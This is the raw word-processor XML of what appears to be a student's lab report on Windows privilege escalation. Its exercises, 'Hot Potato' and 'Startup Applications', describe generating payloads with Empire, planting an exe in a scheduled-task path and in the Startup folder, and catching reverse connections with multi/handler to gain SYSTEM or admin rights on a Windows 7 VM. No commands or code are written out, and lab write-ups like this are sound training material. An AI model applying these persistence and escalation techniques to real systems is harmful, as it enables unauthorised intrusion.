    <w:p w14:paraId="009E3378" w14:textId="440F3E94" w:rsidR="00A377CD" w:rsidRDefault="007F70EB" w:rsidP="007F70EB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="007F70EB">
        <w:t>Exercise 13 – Hot Potato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503ACA8E" w14:textId="75ED4292" w:rsidR="00AC4B91" w:rsidRDefault="00270DDD" w:rsidP="00270DDD">
      <w:r>
        <w:t xml:space="preserve">In that scenario I </w:t>
      </w:r>
      <w:r w:rsidR="00AC4B91">
        <w:t>get the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C67157">
        <w:t xml:space="preserve">system information </w:t>
      </w:r>
      <w:r w:rsidR="00522F91">
        <w:t xml:space="preserve">for run the exploit </w:t>
      </w:r>
      <w:r w:rsidR="00AC4B91">
        <w:t xml:space="preserve">suggester </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F4EFF" w14:textId="66DE834F" w:rsidR="00270DDD" w:rsidRDefault="00AC4B91" w:rsidP="00270DDD">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00522F91">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016064D7" w14:textId="6A09383C" w:rsidR="002409BA" w:rsidRDefault="002409BA" w:rsidP="00270DDD"/>
    <w:p w14:paraId="7EBF5579" w14:textId="2BD2C110" w:rsidR="002409BA" w:rsidRDefault="002409BA" w:rsidP="00270DDD"/>
    <w:p w14:paraId="4F453EE8" w14:textId="1D70E4B4" w:rsidR="00ED78E7" w:rsidRDefault="00ED78E7" w:rsidP="00270DDD">
      <w:r>
        <w:t>I used “Empire” to create malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4457F9DA" w14:textId="13E379EA" w:rsidR="002409BA" w:rsidRDefault="00974DF2" w:rsidP="00270DDD">
      <w:r w:rsidRPr="00974DF2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C8AF4C" wp14:editId="26E236C0">
            <wp:extent cx="5943600" cy="2081530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107" name="Picture 10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website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2081530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20599024" w14:textId="60E69DA1" w:rsidR="002409BA" w:rsidRDefault="00974DF2" w:rsidP="00270DDD">
      <w:r>
        <w:t xml:space="preserve">And I set port 80 , default delay to 0 using “set” command. And after I activated the listener and start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csharp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="00A93A31">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A20B4" w14:textId="287649F3" w:rsidR="00A93A31" w:rsidRDefault="00A93A31" w:rsidP="00270DDD">
      <w:r w:rsidRPr="00A93A31">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CFFBF26" wp14:editId="15351898">
            <wp:extent cx="5943600" cy="3307080"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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05"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3307080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B00AC2" w14:textId="5C14262D" w:rsidR="00ED78E7" w:rsidRDefault="00A161E7" w:rsidP="00270DDD">
      <w:r w:rsidRPr="00A161E7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C097BB2" wp14:editId="086F7ECA">
            <wp:extent cx="5943600" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="110" name="Picture 1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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1304925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4B18D" w14:textId="156E1C01" w:rsidR="00ED78E7" w:rsidRPr="00270DDD" w:rsidRDefault="00ED78E7" w:rsidP="00270DDD"/>
    <w:p w14:paraId="12ECB8A3" w14:textId="4B75B5A8" w:rsidR="007F70EB" w:rsidRPr="007F70EB" w:rsidRDefault="007F70EB" w:rsidP="007F70EB"/>
    <w:p w14:paraId="54F91C30" w14:textId="385FD197" w:rsidR="000B29E1" w:rsidRDefault="009F5EC7" w:rsidP="00D41993">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E33D0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B29E1">
        <w:t>After that “program.exe” copy to the windows file location that schedule task define</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB08ECB" w14:textId="034A5A02" w:rsidR="00ED78E7" w:rsidRDefault="000B29E1" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61CD6DBC" wp14:editId="566BA3B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-109220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="1869583"/>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1869583"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F45F957" w14:textId="0211E351" w:rsidR="00ED78E7" w:rsidRDefault="00ED78E7" w:rsidP="00D41993"/>
    <w:p w14:paraId="7F89EF0B" w14:textId="403C92AE" w:rsidR="009A4F8E" w:rsidRDefault="009A4F8E" w:rsidP="00D41993"/>
    <w:p w14:paraId="6ED3E60A" w14:textId="522CFCC0" w:rsidR="000B29E1" w:rsidRDefault="000B29E1" w:rsidP="00D41993"/>
    <w:p w14:paraId="22E939FA" w14:textId="6861F8B2" w:rsidR="000B29E1" w:rsidRDefault="000B29E1" w:rsidP="00D41993"/>
    <w:p w14:paraId="118EAC71" w14:textId="297A347B" w:rsidR="000B29E1" w:rsidRDefault="000B29E1" w:rsidP="00D41993"/>
    <w:p w14:paraId="75B72F59" w14:textId="77777777" w:rsidR="00A161E7" w:rsidRDefault="00A161E7" w:rsidP="00D41993"/>
    <w:p w14:paraId="0E9234E5" w14:textId="1979EE49" w:rsidR="00456ECC" w:rsidRDefault="000B29E1" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">After copied Restart the Windows 7 VM. After restart in attacker machine automatically connection is established with attacker machine. Now we are </w:t>
      </w:r>
      <w:r w:rsidR="00456ECC">
        <w:t xml:space="preserve">now system authority </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD4032" w14:textId="29E5B31C" w:rsidR="00355173" w:rsidRDefault="00A161E7" w:rsidP="00D41993">
      <w:r w:rsidRPr="00A161E7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CDB328D" wp14:editId="23A82347">
            <wp:extent cx="5943600" cy="1595755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>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08"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1595755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000B29E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C1FD06" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0196149C" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D985D3" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18654035" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3DCEE6" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFE5845" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391D0F5B" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3C9AAC" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222D5D87" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00192362" w14:textId="5F6F1C40" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449B9F30" w14:textId="2136D70C" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="00D95B90"/>
    <w:p w14:paraId="4FE49C55" w14:textId="104E52D5" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="00D95B90"/>
    <w:p w14:paraId="27CC62B6" w14:textId="77777777" w:rsidR="00D95B90" w:rsidRPr="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="00D95B90"/>
    <w:p w14:paraId="243A0151" w14:textId="252463E6" w:rsidR="00E42FAE" w:rsidRDefault="007E7B40" w:rsidP="007E7B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 13 – Hot Potato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46312DE1" w14:textId="5AADDD7A" w:rsidR="00BE4F8F" w:rsidRDefault="006A23DD" w:rsidP="007E7B40">
      <w:r>
        <w:t xml:space="preserve">In this Exercise </w:t>
      </w:r>
      <w:r w:rsidR="00BE4F8F">
        <w:t xml:space="preserve">we need get system info t search vulnerability in the system in this case we use exploit suggester for this exercise. </w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:r w:rsidR="00BE4F8F" w:rsidRPr="00D122C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/AonCyberLabs/Windows-Exploit-Suggester</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BE4F8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B168755" w14:textId="56EEBB30" w:rsidR="00BE4F8F" w:rsidRDefault="00BE4F8F" w:rsidP="007E7B40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="034FE3F7" wp14:editId="509DF5E2">
            <wp:extent cx="5943600" cy="94932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949325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA11211" w14:textId="75356A62" w:rsidR="007E7B40" w:rsidRDefault="00646041">
      <w:r>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00BE4F8F">
        <w:t xml:space="preserve"> I get system inform to text file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1494EB" w14:textId="6D770EEF" w:rsidR="007E7B40" w:rsidRDefault="003914E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B84D2B9" wp14:editId="3925B3C0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-478971</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7103110" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="254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7114553" cy="3154674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44861569" w14:textId="77777777" w:rsidR="007E7B40" w:rsidRDefault="007E7B40"/>
    <w:p w14:paraId="29C7A438" w14:textId="77777777" w:rsidR="007E7B40" w:rsidRDefault="007E7B40"/>
    <w:p w14:paraId="241B860C" w14:textId="77777777" w:rsidR="007E7B40" w:rsidRDefault="007E7B40"/>
    <w:p w14:paraId="3BBE3D73" w14:textId="77777777" w:rsidR="007E7B40" w:rsidRDefault="007E7B40"/>
    <w:p w14:paraId="49B6CF28" w14:textId="77777777" w:rsidR="007E7B40" w:rsidRDefault="007E7B40"/>
    <w:p w14:paraId="14255AA3" w14:textId="77777777" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="05D8FA16" w14:textId="77777777" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="203A9D4D" w14:textId="77777777" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="4281001B" w14:textId="77777777" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="65BB2C8B" w14:textId="77777777" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="5EFF38D6" w14:textId="735B7E27" w:rsidR="003914E9" w:rsidRDefault="003914E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67BBC9E1" wp14:editId="1552B3D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-456655</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>225153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7157085" cy="1175658"/>
            <wp:effectExtent l="0" t="0" r="5715" b="571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7157085" cy="1175658"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B56528E" w14:textId="77777777" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="288B3152" w14:textId="77777777" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="538DBD94" w14:textId="77777777" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="1EEA28FF" w14:textId="18338034" w:rsidR="003914E9" w:rsidRDefault="003914E9"/>
    <w:p w14:paraId="56470449" w14:textId="7D4DBB29" w:rsidR="003914E9" w:rsidRDefault="003914E9">
      <w:r>
        <w:t xml:space="preserve">After entering popup </w:t>
      </w:r>
      <w:r w:rsidR="00646041">
        <w:t>SMB relay Services Details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11FE98" w14:textId="1ED69439" w:rsidR="00646041" w:rsidRDefault="00646041">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29011BBC" wp14:editId="07C16382">
            <wp:extent cx="5943600" cy="33051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05175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEEDDE5" w14:textId="77777777" w:rsidR="00E42FAE" w:rsidRDefault="00E42FAE" w:rsidP="00D41993"/>
    <w:p w14:paraId="5ABD5078" w14:textId="5B6217C8" w:rsidR="001807D1" w:rsidRDefault="001807D1" w:rsidP="001807D1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exercise 14 – Startup Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC679BF" w14:textId="77777777" w:rsidR="00962298" w:rsidRDefault="00322E78" w:rsidP="00420AB2">
      <w:r>
        <w:t xml:space="preserve">Startup application is automatically start when any user logging their account. </w:t>
      </w:r>
      <w:r w:rsidR="00962298">
        <w:t>So we can add malicious exe file and waiting for Admin User logging to the Account and we can get the authority using his privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D372EEB" w14:textId="3A927CC7" w:rsidR="00420AB2" w:rsidRPr="00420AB2" w:rsidRDefault="00962298" w:rsidP="00420AB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C9B882" wp14:editId="4F5E7611">
            <wp:extent cx="6608618" cy="166243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36392" cy="1669417"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D59EF" w14:textId="25602960" w:rsidR="001807D1" w:rsidRDefault="00962298" w:rsidP="001807D1">
      <w:r>
        <w:t>That location has privileges to ay users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752014AC" w14:textId="602151B7" w:rsidR="00962298" w:rsidRDefault="00962298" w:rsidP="001807D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62A301BF" wp14:editId="0FCA54BB">
            <wp:extent cx="6583680" cy="1941195"/>
            <wp:effectExtent l="0" t="0" r="762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598047" cy="1945431"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7948B3C4" w14:textId="381ABD33" w:rsidR="00962298" w:rsidRDefault="00962298" w:rsidP="001807D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="525BB93D" wp14:editId="0EF21671">
            <wp:extent cx="6608445" cy="1787236"/>
            <wp:effectExtent l="0" t="0" r="1905"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56734" cy="1800296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D92C9C" w14:textId="7199EDC5" w:rsidR="00A609C0" w:rsidRDefault="00A609C0" w:rsidP="001807D1">
      <w:r>
        <w:t>After planting that exe we use “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A609C0">
        <w:t>multi/handler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” to listening the connection to connect back to that user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF487A" w14:textId="238F19C5" w:rsidR="00A609C0" w:rsidRDefault="00A609C0" w:rsidP="001807D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43DC4E7E" wp14:editId="65549C42">
            <wp:extent cx="6308567" cy="293914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61332" cy="2963726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="541FCBEF" w14:textId="60289961" w:rsidR="00962298" w:rsidRDefault="002462C2" w:rsidP="001807D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D802E64" wp14:editId="0B3C8B8F">
            <wp:extent cx="5943264" cy="4709886"/>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7052" cy="4712888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090FD2D" w14:textId="203DA3D3" w:rsidR="002462C2" w:rsidRDefault="002462C2" w:rsidP="001807D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A71A6C6" wp14:editId="6209D98A">
            <wp:extent cx="5320145" cy="57626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22342" cy="5765005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C29FE7" w14:textId="007D6159" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1"/>
    <w:p w14:paraId="650C53B2" w14:textId="24F3AEA1" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1"/>
    <w:p w14:paraId="337F290F" w14:textId="305704BC" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1"/>
    <w:p w14:paraId="155D6370" w14:textId="3ABC6993" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1"/>
    <w:p w14:paraId="692AF47B" w14:textId="2FF208D9" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1"/>
    <w:p w14:paraId="734A3177" w14:textId="00588AC2" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1"/>
    <w:p w14:paraId="5FCFF6F0" w14:textId="48413373" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1"/>
    <w:p w14:paraId="063294D1" w14:textId="5D83C714" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1"/>
    <w:p w14:paraId="23792A1A" w14:textId="59098026" w:rsidR="00B310DA" w:rsidRDefault="00B310DA" w:rsidP="001807D1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8617DB" w14:textId="66F3B5D5" w:rsidR="00B310DA" w:rsidRDefault="009C445E" w:rsidP="001807D1">
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r w:rsidR="00B310DA" w:rsidRPr="009A0877">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pentestlab.blog/tag/imagepath/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B310DA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E93A4CA" w14:textId="1642EE68" w:rsidR="00D95B90" w:rsidRDefault="00D95B90" w:rsidP="001807D1">
      <w:hyperlink r:id="rId121" w:history="1">
        <w:r w:rsidRPr="00D11CBF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bc-security.org/post/overview-of-empire-4-0-and-c/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC35E44" w14:textId="77777777" w:rsidR="00393F10" w:rsidRPr="00393F10" w:rsidRDefault="00393F10" w:rsidP="00393F10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00393F10">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t> : standard PE format for Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804211B" w14:textId="77777777" w:rsidR="00393F10" w:rsidRPr="00393F10" w:rsidRDefault="00393F10" w:rsidP="00393F10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="323131"/>
